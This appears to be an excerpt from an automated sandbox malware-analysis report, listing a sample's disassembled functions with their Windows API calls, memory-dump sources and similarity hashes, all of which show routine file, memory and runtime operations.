                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Thread$CreatePriority__vswprintf_c_l
                                                            • String ID: CreateThread failed
                                                            • API String ID: 2655393344-3849766595
                                                            • Opcode ID: ca8ae3f84e31a4a3d397b1161229568e4f064d500a54d425ebb4fb091ddaae19
                                                            • Instruction ID: e5391028b70138de81cd2509720601b32dddd12e45985ddd017a51b0b0bad4bc
                                                            • Opcode Fuzzy Hash: ca8ae3f84e31a4a3d397b1161229568e4f064d500a54d425ebb4fb091ddaae19
                                                            • Instruction Fuzzy Hash: 0C01F2B13447066FE320AF549C81BA27399FF51712F10022DFB896A0C1CBA4A8458724
                                                            Function 0004B1EA Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0004E77B,00000001,?,?,?,00000000,00056692,?,?,?), ref: 0004B20E
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00056692,?,?,?,?,?,00056154,?), ref: 0004B255
                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0004E77B,00000001,?,?), ref: 0004B281
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$Handle
                                                            • String ID:
                                                            • API String ID: 4209713984-0
                                                            • Opcode ID: d2b83aa9b0bb4d4e0f00bd3486bdaa297e4263733cf250857c78674283f31343
                                                            • Instruction ID: d743bec9cc974df107a8f69fba481bb1225a8854daacf7deb783b32337509fec
                                                            • Opcode Fuzzy Hash: d2b83aa9b0bb4d4e0f00bd3486bdaa297e4263733cf250857c78674283f31343
                                                            • Instruction Fuzzy Hash: 0631E4B1604305AFEB14CF24D908B6E77A5FB81715F04052CF98567290CBB8DD48CBAA
                                                            Function 0004B522 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0004D66B: _wcslen.LIBCMT ref: 0004D671
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B549
                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B57C
                                                            • GetLastError.KERNEL32(?,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B599
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                            • String ID:
                                                            • API String ID: 2260680371-0
                                                            • Opcode ID: 4e0422d9ef0e627e7dde39d011f253cec12336b00d9fa14d5a5bcdceec511cae
                                                            • Instruction ID: 322ccf12d48bc8e793df1266a44dc921de695508dcc066332ad723fe93fe7501
                                                            • Opcode Fuzzy Hash: 4e0422d9ef0e627e7dde39d011f253cec12336b00d9fa14d5a5bcdceec511cae
                                                            • Instruction Fuzzy Hash: BD01FCF1504714A6EF616B745C45FFEB3DCAF09781F044434F906E6092DB68DA81C6B9
                                                            Function 0006C8A3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0006C8C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            • Opcode ID: 0208dca658d44c5c1ee331c254b95e76fc71931b9bf07915cdcccabdb356c4a7
                                                            • Instruction ID: 2dda6b899bc0949177531b46eb83f618a4cc95a744517497fa57ecc08206fe69
                                                            • Opcode Fuzzy Hash: 0208dca658d44c5c1ee331c254b95e76fc71931b9bf07915cdcccabdb356c4a7
                                                            • Instruction Fuzzy Hash: E041FA7050424C9EEB218E648C88EFABBEAEB55308F1404EDE5DAC7142D235AE45DF30
                                                            Function 0006BF7C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 0006BFED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 2568140703-3893581201
                                                            • Opcode ID: ba5dd38a1aaba76b029085f606278db6ba1c6aa237a171e99e4c30089f050069
                                                            • Instruction ID: 78de18a13c4c2205d4f54b39ee1d7a2f522af049fd5eb634c0a4f57bbfd1076e
                                                            • Opcode Fuzzy Hash: ba5dd38a1aaba76b029085f606278db6ba1c6aa237a171e99e4c30089f050069
                                                            • Instruction Fuzzy Hash: 2E01E532A41209BBEF129F90DC05DEE7FA6EF08760F018515FE0865161CB7A89B1AB95
                                                            Function 0006BF1A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0006B57F), ref: 0006BF65
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3084827643
                                                            • Opcode ID: 7cdcd4789c31a24ff785fbb47c4de4feffd236a837a195608eccfdd2cadca280
                                                            • Instruction ID: c9d8a254c82f41eb6b7899d4ed83c1107d56ff7b04eedd3a75d66fd13ae11ce2
                                                            • Opcode Fuzzy Hash: 7cdcd4789c31a24ff785fbb47c4de4feffd236a837a195608eccfdd2cadca280
                                                            • Instruction Fuzzy Hash: 72F0B431E81118BBEB119F50DC05C9E7FA2EF24760B408065FD096A271CF7549519B85
                                                            Function 0006BDBF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Alloc
                                                            • String ID: FlsAlloc
                                                            • API String ID: 2773662609-671089009
                                                            • Opcode ID: e85ed446fc4f6d12aaba1f9fdd0dded4fd1f4341f8513f989fe7fc27c58cf7b7
                                                            • Instruction ID: 2336c2f6057ba291003182a935bbc9113f830a8f84241c986123f18e8da66076
                                                            • Opcode Fuzzy Hash: e85ed446fc4f6d12aaba1f9fdd0dded4fd1f4341f8513f989fe7fc27c58cf7b7
                                                            • Instruction Fuzzy Hash: 14E05530F812187BE3006B209C069BEBBA5CB14720B458016FA09AB240CF791E8187DE
                                                            Function 0006CC00 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0006C7CB: GetOEMCP.KERNEL32(00000000,?,?,0006CA54,?), ref: 0006C7F6
                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0006CA99,?,00000000), ref: 0006CC74
                                                            • GetCPInfo.KERNEL32(00000000,0006CA99,?,?,?,0006CA99,?,00000000), ref: 0006CC87
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: cf184ceca8f446bb543210f89a0223e84b7d0a08810e7bc29f95b053f063e9f2
                                                            • Instruction ID: 1a384f04f78f4b99ac061af57447114f634749fa3986ad3305baa4946c463fed
                                                            • Opcode Fuzzy Hash: cf184ceca8f446bb543210f89a0223e84b7d0a08810e7bc29f95b053f063e9f2
                                                            • Instruction Fuzzy Hash: 8F511170A002459EFB209F75C885EFABFE6AF85310F14447EE0DA8B252D7399946CB90
                                                            Function 0004ACB4 Relevance: 3.1, APIs: 2, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-000018C0,00000000,00000800,?,0004AC90,?,?,00000000,?,?,00049C6D,?), ref: 0004AE1A
                                                            • GetLastError.KERNEL32(?,?,00049C6D,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 0004AE29
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 6f46d6e246aaf18de8b4b2f9d7144fa01d2e0c97c6f5390e3279e7396ace5f75
                                                            • Instruction ID: 4e8d8a63dfabf0859c7c05de8c42aa87dc4fcbcbe1bcbe476515d338a8101bdd
                                                            • Opcode Fuzzy Hash: 6f46d6e246aaf18de8b4b2f9d7144fa01d2e0c97c6f5390e3279e7396ace5f75
                                                            • Instruction Fuzzy Hash: 6F4124F4B843458BDB349E24C488AAE73E5FB4A322F100539E95787A51D7B4DC818B9B
                                                            Function 0006CA37 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0006A365: GetLastError.KERNEL32(?,000830C4,000657D2,000830C4,?,?,0006524D,?,?,000830C4), ref: 0006A369
                                                              • Part of subcall function 0006A365: _free.LIBCMT ref: 0006A39C
                                                              • Part of subcall function 0006A365: SetLastError.KERNEL32(00000000,?,000830C4), ref: 0006A3DD
                                                              • Part of subcall function 0006A365: _abort.LIBCMT ref: 0006A3E3
                                                              • Part of subcall function 0006CB5E: _abort.LIBCMT ref: 0006CB90
                                                              • Part of subcall function 0006CB5E: _free.LIBCMT ref: 0006CBC4
                                                              • Part of subcall function 0006C7CB: GetOEMCP.KERNEL32(00000000,?,?,0006CA54,?), ref: 0006C7F6
                                                            • _free.LIBCMT ref: 0006CAAF
                                                            • _free.LIBCMT ref: 0006CAE5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorLast_abort
                                                            • String ID:
                                                            • API String ID: 2991157371-0
                                                            • Opcode ID: 79a8effec5aa7dfd3409f5f450d0c5cd66696f89cc2d7d3532d407ab6092d89a
                                                            • Instruction ID: cb2999b5443867c5a711c63646ca837758c2f02ef816ab77033bbf215909392a
                                                            • Opcode Fuzzy Hash: 79a8effec5aa7dfd3409f5f450d0c5cd66696f89cc2d7d3532d407ab6092d89a
                                                            • Instruction Fuzzy Hash: 4931E231904208AFEB10EFE8D840FBE77E7EF41324F254099E8449B292EB369D41DB91
                                                            Function 0004B012 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00047EB0,?,?,?,00000000), ref: 0004B02C
                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 0004B0E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: File$BuffersFlushTime
                                                            • String ID:
                                                            • API String ID: 1392018926-0
                                                            • Opcode ID: 774157747b4dc2a7fcde93b26b48f8bd96f7811a1ce6601a2492ca0c858f2b71
                                                            • Instruction ID: 7855c3c7defa46e8f66789b2433833ca5018487a9138f788422b5a58662a7e7e
                                                            • Opcode Fuzzy Hash: 774157747b4dc2a7fcde93b26b48f8bd96f7811a1ce6601a2492ca0c858f2b71
                                                            • Instruction Fuzzy Hash: 0221E171248242EFC714DE64C891AABBBE4AF55306F04492DB8E583152D729E90CD766
                                                            Function 0004A8AE Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,0004B197,?,?,000481DD), ref: 0004A926
                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,0004B197,?,?,000481DD), ref: 0004A956
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 4578682801949b6d4d96eb76d906774152199d035e9a50d31896a41d09665ac9
                                                            • Instruction ID: 784191f44b7bbfc0127366ebabac410011bc46bf9bd711c3d5076e5a23268c13
                                                            • Opcode Fuzzy Hash: 4578682801949b6d4d96eb76d906774152199d035e9a50d31896a41d09665ac9
                                                            • Instruction Fuzzy Hash: AB21D6B16443446EE3B08A65CC89FF776DCEB4A321F014A29F9D6C21D2C778AC849776
                                                            Function 00041F30 Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00041F35
                                                              • Part of subcall function 000442DA: __EH_prolog.LIBCMT ref: 000442DF
                                                            • _wcslen.LIBCMT ref: 00041FDA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            • Opcode ID: b299be28bfcdddca3a24ac8c6c76c19e32cd7e110356e6a3c79e51a30b14f12b
                                                            • Instruction ID: 357c8c013420875172955a954d61164232200462affa51ade91e65b3ec7cebbd
                                                            • Opcode Fuzzy Hash: b299be28bfcdddca3a24ac8c6c76c19e32cd7e110356e6a3c79e51a30b14f12b
                                                            • Instruction Fuzzy Hash: 39216BB1904218AFCF11AF98D8559EEFBB6BF08300F00043DE446A7262C7755995CB68
                                                            Function 00064B52 Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,00000001,000A40C4,?,?,?,00064D46,00000004,InitializeCriticalSectionEx,00077424,InitializeCriticalSectionEx,00000000,?,00064AFD,000A40C4,00000FA0), ref: 00064BD5
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00064BDF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeLibraryProc
                                                            • String ID:
                                                            • API String ID: 3013587201-0
                                                            • Opcode ID: bd17c5732fe983631bfe7181ed23e3c61f604fc551f5bd5ad4a0649365f99655
                                                            • Instruction ID: 4fedfab74ccb12a020d349cd713362c9a7b16b30808970be0e6929d760a4bd12
                                                            • Opcode Fuzzy Hash: bd17c5732fe983631bfe7181ed23e3c61f604fc551f5bd5ad4a0649365f99655
                                                            • Instruction Fuzzy Hash: D6117C35A04115DF9F22CFA8ECC0AAE73E6FF4635072412A9EA05A7210E774ED41CBD0
                                                            Function 0004B0F0 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0004B137
                                                            • GetLastError.KERNEL32 ref: 0004B144
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 0523078c299fab0ceaeb2ece1a3dd177ebdd85b2a5ccb0e9ad46176f2bd97628
                                                            • Instruction ID: 0483f61acccab46dc7d1d638d6ee3d46102130de2c5b8257d72a8c125f13a3d8
                                                            • Opcode Fuzzy Hash: 0523078c299fab0ceaeb2ece1a3dd177ebdd85b2a5ccb0e9ad46176f2bd97628
                                                            • Instruction Fuzzy Hash: 971108B1A00200EBEB349628CC51BA7B3E9BB45370FA00B79E152D35E0D774ED45C754
                                                            Function 0006A4F4 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 0006A515
                                                              • Part of subcall function 0006A64E: RtlAllocateHeap.NTDLL(00000000,?,?,?,000653E4,?,0000015D,?,?,?,?,000668C0,000000FF,00000000,?,?), ref: 0006A680
                                                            • HeapReAlloc.KERNEL32(00000000,?,?,?,?,000830C4,0004187A,?,?,00000007,?,?,?,000413F2,?,00000000), ref: 0006A551
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
